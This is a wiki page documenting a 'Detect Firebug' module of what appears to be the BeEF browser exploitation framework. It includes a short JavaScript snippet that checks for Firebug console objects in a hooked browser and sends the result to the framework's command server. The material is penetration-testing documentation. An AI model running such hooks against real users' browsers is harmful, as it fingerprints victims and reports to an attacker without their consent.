Skip to content

Module: Detect Firebug

Jess Williams edited this page Jan 2, 2020 · 5 revisions

Summary

  • Objective: This module checks if the Mozilla Firefox Firebug extension is being use to inspect the current window.
  • Date: February 2012
  • Author: bcoles
  • Browser: Firefox
  • code

Internal Working

This module test if window.console.firebug or window.console.exception objects exists to detect enabled firefbug module:

beef.execute(function() {
    var result = "Not in use or not installed";
    if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled and in use!";
        beef.net.send("<%= @command_url %>", <%= @command_id %>, "firebug="+result);
});
Clone this wiki locally